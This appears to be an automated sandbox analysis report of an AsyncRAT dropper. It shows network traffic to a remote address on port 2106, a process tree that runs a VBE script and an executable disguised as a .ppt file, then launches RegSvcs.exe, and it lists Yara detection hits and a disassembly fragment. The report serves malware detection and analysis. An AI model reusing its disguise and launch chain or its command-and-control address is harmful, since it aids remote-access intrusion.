                                      Dec 31, 2024 20:29:47.696240902 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:47.702146053 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:47.706949949 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:47.707006931 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:47.711730003 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:49.866231918 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:49.870982885 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:49.871668100 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:49.876421928 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:50.097399950 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:50.174796104 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:50.224014044 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:50.226258039 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:50.231110096 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:50.231162071 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:50.235994101 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:57.765583992 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:57.770353079 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:57.775480986 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:57.780237913 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:57.958282948 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:58.008249044 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:58.127068996 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:58.128931046 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:58.133697987 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:29:58.133744001 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:29:58.138578892 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:00.709928036 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:00.714701891 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:00.714768887 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:00.719480038 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:00.940238953 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.068248034 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.068361998 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.074743032 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.079497099 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.079593897 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.084350109 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.603480101 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.608272076 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.609594107 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.614330053 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.803788900 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.936083078 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.936155081 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.937736988 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.942513943 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:01.942626953 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:01.947412014 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.053662062 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.058489084 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.059477091 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.064249992 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.252439976 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.318922997 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.379966021 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.383481979 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.388219118 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:05.388403893 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:05.393155098 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:09.927218914 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:10.006730080 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:10.059885979 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:10.115742922 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.463382959 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.468214989 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.468327045 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.473088980 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.675759077 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.727396965 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.762376070 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.764051914 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.768800020 CET210649737195.26.255.81192.168.2.4
                                      Dec 31, 2024 20:30:13.771495104 CET497372106192.168.2.4195.26.255.81
                                      Dec 31, 2024 20:30:13.776845932 CET210649737195.26.255.81192.168.2.4

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:14:26:06
                                      Start date:31/12/2024
                                      Path:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\yjOJ1YK5M3.exe"
                                      Imagebase:0x270000
                                      File size:1'020'449 bytes
                                      MD5 hash:7B17EBBF77F53472D2FEBB38E9785026
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:14:26:10
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
                                      Imagebase:0x4d0000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      Wow64 process (32bit):true
                                      Commandline:cipkucw.ppt xdgrnj.pdf
                                      Imagebase:0x6f0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:14:26:20
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /release
                                      Imagebase:0x320000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:14:26:23
                                      Start date:31/12/2024
                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                      Wow64 process (32bit):true
                                      Commandline:ipconfig /renew
                                      Imagebase:0x320000
                                      File size:29'184 bytes
                                      MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:14:26:30
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0xbd0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:false

                                      General

                                      Target ID:15
                                      Start time:14:26:36
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:14:26:42
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0x390000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:14:26:49
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:14:26:56
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0xb20000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:14:26:58
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE" C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                                      Imagebase:0xfc0000
                                      File size:947'288 bytes
                                      MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:14:27:04
                                      Start date:31/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                      Imagebase:0x770000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.9%
                                        Total number of Nodes:1925
                                        Total number of Limit Nodes:45
                                        execution_graph 27630 271125 27635 2776e7 27630->27635 27632 27112a 27643 296029 29 API calls 27632->27643 27634 271134 27636 2776f3 __EH_prolog3 27635->27636 27644 280aaf 27636->27644 27638 2776fd 27647 284f2b 27638->27647 27640 277874 27651 277cba GetCurrentProcess GetProcessAffinityMask 27640->27651 27642 277891 27642->27632 27643->27634 27652 280b05 27644->27652 27648 284f37 __EH_prolog3 27647->27648 27661 271ece 28 API calls 27648->27661 27650 284f50 27650->27640 27651->27642 27653 280b17 _abort 27652->27653 27656 2876e5 27653->27656 27659 2876a7 GetCurrentProcess GetProcessAffinityMask 27656->27659 27660 280b01 27659->27660 27660->27638 27661->27650 27662 27e3d5 27663 27e3df 27662->27663 27666 27e551 SetFilePointer 27663->27666 27667 27e403 27663->27667 27665 27e481 27666->27667 27668 27e56e GetLastError 27666->27668 27669 295734 27667->27669 27668->27667 27670 29573d IsProcessorFeaturePresent 27669->27670 27671 29573c 27669->27671 27673 295bfc 27670->27673 27671->27665 27676 295bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27673->27676 27675 295cdf 27675->27665 27676->27675 27677 294cda 27678 294c88 27677->27678 27680 294fce 27678->27680 27706 294d2c 27680->27706 27682 294fde 27683 29503b 27682->27683 27684 29505f 27682->27684 27685 294f6c DloadReleaseSectionWriteAccess 8 API calls 27683->27685 27687 2950d7 LoadLibraryExA 27684->27687 27688 295138 27684->27688 27694 29514a 27684->27694 27695 295206 27684->27695 27686 295046 RaiseException 27685->27686 27701 295234 27686->27701 27687->27688 27689 2950ea GetLastError 27687->27689 27691 295143 FreeLibrary 27688->27691 27688->27694 27692 2950fd 27689->27692 27693 295113 27689->27693 27690 2951a8 GetProcAddress 27690->27695 27697 2951b8 GetLastError 27690->27697 27691->27694 27692->27688 27692->27693 27696 294f6c DloadReleaseSectionWriteAccess 8 API calls 27693->27696 27694->27690 27694->27695 27717 294f6c 27695->27717 27698 29511e RaiseException 27696->27698 27699 2951cb 27697->27699 27698->27701 27699->27695 27702 294f6c DloadReleaseSectionWriteAccess 8 API calls 27699->27702 27701->27678 27703 2951ec RaiseException 27702->27703 27704 294d2c ___delayLoadHelper2@8 8 API calls 